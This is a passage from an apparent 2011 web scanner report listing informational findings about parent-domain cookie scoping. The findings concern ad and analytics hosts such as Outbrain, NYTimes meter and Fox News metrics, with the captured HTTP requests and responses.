rsi_segs_1000000=pUPF4j+henIMH/C100a+jtCu45rT9IYbFYbvkn1IvjQmufPZU63k5HlskvBlDss6Igu8xVRBiNmaK4Lic/M7qqdLKXWdboCsn61rq5AkztuKb0IvXekGDZnEl7VxenkiyCDg81HVKjG4wjkLb+T/rqFLOIEHC1m126ThWdH4Oibt5g6+6wxRQoVxtNa6HvCKmJiPgVsa1pO+T3aT0ejKdP7PlgnzcY1VCoyQDLtLVTvH6BS62tKSX6Gss5B41RKwjVX9Do5QX+V0znhrEm9Z1DYYdkJ6gOUa5i60P1kHsPF7FPnj1MB3MWvIuzzuKa626UKVYCvhZydsMMUPnURLDJKNckPDNbr0LsKc1kCWsQOVkekvaGGDMK+I9eStphrvq6k2G/uk49gspfTYatcLNnIimAsxFKobA5H7QSijZ13S7Xq+lO0XZpFzdiav8PzEpMeAPBVodiYbPR+3Swq9aFFCiZrA9dUa9ZotE63wsOYqGUJLAKlP/5x+umISCTrqbquCGh7QaKEQX0F3MayZ3FReUei1S6NcVRY4yLPzfxFRV9bIE1VbtW4uoF7AqCIfIu1NMJi82Gim3KWeZZnzDEbFI6wSqC0v5UU68Asl3ZAoWF99qLQVi8YoxpbGRkzJddHYPVrDD5AFYqmLiTgvig/G1qfs48EJBCz0QOWh/cbstO41QnJ39fJXw8C3g9BAo/gYivG2p8469jMJyUokOBaJo0BXBEWGG7WjNVWuTmEH+T6puL7ix2jFHkKEVtVinFQv8bsnT+c1qIbf54B2suX9LG78U7o3XFQfjk2GmmWBxw==; rtc_TX1Q=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
If-Modified-Since: Wed, 27 Apr 2011 19:54:40 GMT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvv9C8Nbjpr557JDEzV6Qmy8vzjOnVlM1b8qoT6P/6jKqFB/AArMvE354eECpVFUpsB/ryF27g64s1oM+s/x82jWjDWUitF+udc3DBM6vFMHdu5LWXcWh1waMn+vD2Pi/6/opLpmA7/Gh0bU5IV0Qrx9dc6VHrKAlCT+hfLClNEUrJSkl2S16oTX7CbgSzypfrpc5VLHYI4c+tj2HEl9lfUdyQ9pWp2gRt3PQ1W9TQEiWXYkLtOkMeKKdqenqP8xd8DJgB9Wm9RFff5Q+bgLy4ePU1qoWyXDHQhYYX7yWeCZeEqilf95qoJAOocGO3qM+iYrceWGHRZq93uAomiKPWg7Z+zLzxGPJDp/fKjMPujah8JN+oi+DaZrQIKIYG6g2TSG1vnYEMZ2JbZVTVZhDxARFZleeWURff9Wx751+tKHaMu/xn3RYaKszrGZA6RlwCt+NuqPoznRX4vck+HldWUVG1A1qbpn3rL2sb/MVkLJXjka3vTLDQkmdGZktW+0pu0LESzKT7GnaXO5eZ+dSyKkA4Q48QAd77LWt2RfYKKjVpi9R/R1/W/RIUlUmivDsAZun9Uj65R1/ShixxdBZtXiudcxuvCsvcW/IdlomzTs7FHCC6AgFwCuDGL4ricj7NcRFR4JxEj7vN++KZFIy18++/lbJXdRgytPK59o4PzVl0T2OcajqS3RSO9NBPwab9+86ccnLs8ds1bjsFzEzKdf/V0iuMCNT7mRXjbxqJdzNQ2zz72+8KSOE9dc/lBj4aC/SyO3LegBHbbnrDHp+grjq8BMcNbn89X3XvY0r/Y8TxrMsLt20IVNBrHwqXzvLeRHtLmVV8weNvSWfkfe5sUSUrPZ1hobafq3mgOKAjfS7tG/VRENDOG21AH7Aspp8ZZAP4A7faTxGwUqJdFHvML5BWA1W48dpbdADNo3WtKmMY4HYawF8Ar2+H04UdeyvCc5nvQgoItg43GpvfcBLVk3+vCQB0wCo2nk3lJqm95+kCZG278se39Cw/iLIG1S3U9l8Fk6j1ydFvxo312YEoSNKI2370IUuJN2kcNHEQRxTLaRjWz9sNRM7mM5TSklUq76M/CaknlqZWm96YXib3fE5d29SK6/9opQVO5ZxJ1GnDnBa9Wu3wg1ngult5Gjm0pyTLRF5YiMj6e8lD2uBVjnTvz9hMTUO56RQBkZMwSiXRTs0QeV0NSQWJBbpg9J19+PqYrvnGFvj1q/LjTeriUaRU9gS2r+Pip5bOvrFA6kBzDJPzJiiYsNl5AwprDcx7KIxZMWNaHqhupRp5HKeDVtNBbHkuhxmbEzAemNrX58a+ern0c60eE/Ti9RfCOzrACEKzCE5EFzwS5Wpi4ek7JevMmowSdz+NZEmFg4WyzC1T0WJ+hNjJ3NNrjWRwjVM/Gf3tTRx6iX2j0PyDr//pq2pdZXZ7YD/zcp8n7qoNWRZbE6V7AEvfIY1u3o7lUJkRzOJRd2VBo28NOxEfzMDFtbZ1gAlvX5g==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:11 GMT; Path=/
Last-Modified: Thu, 12 May 2011 11:37:11 GMT
Cache-Control: max-age=3600, private
Expires: Thu, 12 May 2011 12:37:11 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:10 GMT
Content-Length: 5707

//Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC)
var rsi_now= new Date();
var rsi_csid= 'K05539';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

13.48. http://m1463.ic-live.com/572/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m1463.ic-live.com
Path:	/572/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ngx_userid=173.193.214.243:1305198193830; Domain=.ic-live.com; Expires=Sat, 11-May-2013 11:03:13 GMT; Path=/
pid2=1305198194n7FRy5HWuZy599; Domain=.ic-live.com; Expires=Fri, 11-May-2012 11:03:13 GMT; Path=/
sid1463=1305198194n7FRy5HWuZy599; Domain=.ic-live.com; Path=/
cvt572=105989004; Domain=.ic-live.com; Expires=Sat, 11-Jun-2011 11:03:13 GMT; Path=/
ngx_105989004=2011-05-12:04:03:13; Domain=.ic-live.com; Expires=Fri, 13-May-2011 11:03:13 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /572/?105989004&OVMTC=e&OVKEY=private%20equity%20investors&timestamp=20110512110254&creative=1294844&adcid=4583118 HTTP/1.1
Host: m1463.ic-live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C73A01F5BEE38ED2F3A801AA8E6D7816.mch1-rdr-3; Path=/
Set-Cookie: ngx_userid=173.193.214.243:1305198193830; Domain=.ic-live.com; Expires=Sat, 11-May-2013 11:03:13 GMT; Path=/
Set-Cookie: pid2=1305198194n7FRy5HWuZy599; Domain=.ic-live.com; Expires=Fri, 11-May-2012 11:03:13 GMT; Path=/
Set-Cookie: sid1463=1305198194n7FRy5HWuZy599; Domain=.ic-live.com; Path=/
Set-Cookie: cvt572=105989004; Domain=.ic-live.com; Expires=Sat, 11-Jun-2011 11:03:13 GMT; Path=/
Set-Cookie: ngx_105989004=2011-05-12:04:03:13; Domain=.ic-live.com; Expires=Fri, 13-May-2011 11:03:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT"
Location: https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004
Date: Thu, 12 May 2011 11:03:13 GMT
Set-Cookie: Coyote-2-a21011e=a210185:0; path=/
Content-Length: 0

13.49. http://marketing.csscorp.com/acton/bn/1090/visitor.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://marketing.csscorp.com
Path:	/acton/bn/1090/visitor.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wp1090=UTCTDDDDDDTVYCAV; Domain=.csscorp.com; Expires=Fri, 11-May-2012 12:10:14 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /acton/bn/1090/visitor.gif?ts=1305202212105&ref= HTTP/1.1
Host: marketing.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: csscorp=173.193.214.243.1305201370918613; __utma=202015363.216220317.1305202210.1305202210.1305202210.1; __utmb=202015363.1.10.1305202210; __utmc=202015363; __utmz=202015363.1305202210.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LOOPFUSE=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: wp1090=UTCTDDDDDDTVYCAV; Domain=.csscorp.com; Expires=Fri, 11-May-2012 12:10:14 GMT; Path=/
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: image/gif;charset=UTF-8
Content-Length: 43
Date: Thu, 12 May 2011 12:10:13 GMT

GIF89a.............!.......,...........L..;

13.50. http://meter-svc.nytimes.com/meter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://meter-svc.nytimes.com
Path:	/meter.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; expires=Tue, 10-May-2016 11:03:07 GMT; path=/; domain=.nytimes.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meter.js?url=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&referer=&callback=c1305198171060 HTTP/1.1
Host: meter-svc.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; nyt-m=E3DB375A9111923DC1D65DE89ACF26F3&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.9.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:03:07 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Server: nginx/0.7.59
Set-Cookie: nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; expires=Tue, 10-May-2016 11:03:07 GMT; path=/; domain=.nytimes.com
Content-Length: 114
Connection: keep-alive

c1305198171060({"hitPaywall":false,"counted":false,"loggedIn":false,"hash":"D30DFD30595EF4324E4B50EE62114094"});

13.51. http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.foxnews.com
Path:	/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26E5E362850118AA-4000010460000E60[CE]; Expires=Tue, 10 May 2016 11:38:45 GMT; Domain=.foxnews.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302?AQB=1&ndh=1&t=12/4/2011%206%3A38%3A1%204%20300&ce=utf-8&ns=foxnews&pageName=fbn%3Amarkets%3Afront%3Aarticle&g=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&r=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&cc=USD&ch=markets&events=event1&c1=markets&v1=D%3Dc1&h1=fbn%2Cmarkets&c2=markets&v2=D%3Dc2&c3=markets&v3=D%3Dc3&h3=Referrers&c4=markets&v4=D%3Dc4&v10=D%3DpageName&c11=f98dc357cc6bf210VgnVCM10000086c1a8c0RCRD&v11=D%3Dc11&c12=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer&v12=D%3Dc12&c13=article&v13=D%3Dc13&c14=Charlie%20Gasparino&v14=D%3Dc14&c15=Fox%20Business&v15=D%3Dc15&c16=markets&v16=D%3Dc16&c22=New&v22=New&c23=D%3DpageName&c26=1&c27=First%20Visit&c40=markets%3Amarkets%3A2011%3A05%3A03%3Alegendary-deal-maker-ted-forstmann-treated-brain-cancer%3ATed%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&c41=7%3A30AM&v41=7%3A30AM&c42=Thursday&v42=Thursday&c45=Referrers&v45=D%3Dc45&c46=n/a&v46=D%3Dc46&c47=dealbook.nytimes.com&v47=D%3Dc47&v48=dealbook.nytimes.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1046&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:38:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E5E362850118AA-4000010460000E60[CE]; Expires=Tue, 10 May 2016 11:38:45 GMT; Domain=.foxnews.com; Path=/
Location: http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302?AQB=1&pccr=true&vidn=26E5E362850118AA-4000010460000E60&&ndh=1&t=12/4/2011%206%3A38%3A1%204%20300&ce=utf-8&ns=foxnews&pageName=fbn%3Amarkets%3Afront%3Aarticle&g=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&r=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&cc=USD&ch=markets&events=event1&c1=markets&v1=D%3Dc1&h1=fbn%2Cmarkets&c2=markets&v2=D%3Dc2&c3=markets&v3=D%3Dc3&h3=Referrers&c4=markets&v4=D%3Dc4&v10=D%3DpageName&c11=f98dc357cc6bf210VgnVCM10000086c1a8c0RCRD&v11=D%3Dc11&c12=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer&v12=D%3Dc12&c13=article&v13=D%3Dc13&c14=Charlie%20Gasparino&v14=D%3Dc14&c15=Fox%20Business&v15=D%3Dc15&c16=markets&v16=D%3Dc16&c22=New&v22=New&c23=D%3DpageName&c26=1&c27=First%20Visit&c40=markets%3Amarkets%3A2011%3A05%3A03%3Alegendary-deal-maker-ted-forstmann-treated-brain-cancer%3ATed%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&c41=7%3A30AM&v41=7%3A30AM&c42=Thursday&v42=Thursday&c45=Referrers&v45=D%3Dc45&c46=n/a&v46=D%3Dc46&c47=dealbook.nytimes.com&v47=D%3Dc47&v48=dealbook.nytimes.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1046&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 11:38:45 GMT
Last-Modified: Fri, 13 May 2011 11:38:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www35
Content-Length: 0
Content-Type: text/plain

13.52. http://odb.outbrain.com/utils/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 11:38:58 GMT; Path=/
tick=1305200338968; Domain=.outbrain.com; Path=/
_lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIzfjUZTvndAnxUfc7q0DyhK"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 11:38:58 GMT; Path=/
_lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFbCCininxsHoqtNnPoy33i"; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Thu, 19-May-2011 00:26:58 GMT; Path=/
_rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 11:38:58 GMT; Path=/
recs-e80144bf1a192df3448809d952ee1141="eC1Ki6F3rC8/svSOgW/oVTpcaosScNndNmo3MfZ/qv3YEjyvRDq1LX6X1QyPUzCq6iss2g1lePRnvUVzvXh96eFC8InIUHABF8oRDv48Y9bI07wQyS0dxtSyPDvDcjnrDOayEsL6HLp5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Thu, 12-May-2011 11:43:58 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=37740&ref=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F03%2Fforstmann-is-said-to-be-undergoing-treatment-for-brain-cancer%2F&apv=false&rand=0.3115259031765163&sig=poBUI2TM HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIxU/gzm6hl65Q=="; _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFKcF+HzHyRcQ=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 11:38:58 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1305200338968; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIzfjUZTvndAnxUfc7q0DyhK"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 11:38:58 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFbCCininxsHoqtNnPoy33i"; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Thu, 19-May-2011 00:26:58 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 11:38:58 GMT; Path=/
Set-Cookie: recs-e80144bf1a192df3448809d952ee1141="eC1Ki6F3rC8/svSOgW/oVTpcaosScNndNmo3MfZ/qv3YEjyvRDq1LX6X1QyPUzCq6iss2g1lePRnvUVzvXh96eFC8InIUHABF8oRDv48Y9bI07wQyS0dxtSyPDvDcjnrDOayEsL6HLp5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Thu, 12-May-2011 11:43:58 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:38:58 GMT
Content-Length: 9669

outbrain_rater.returnedOdbData({'response':{'exec_time':22,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'203171120','req_id':'6b5cb9196177dce1b62f4444a3713fd2'},'score':{'preferred
...[SNIP]...

13.53. http://odb.outbrain.com/utils/ping.html previous next

Summary

Severity:	Information
Confidence:	Certain
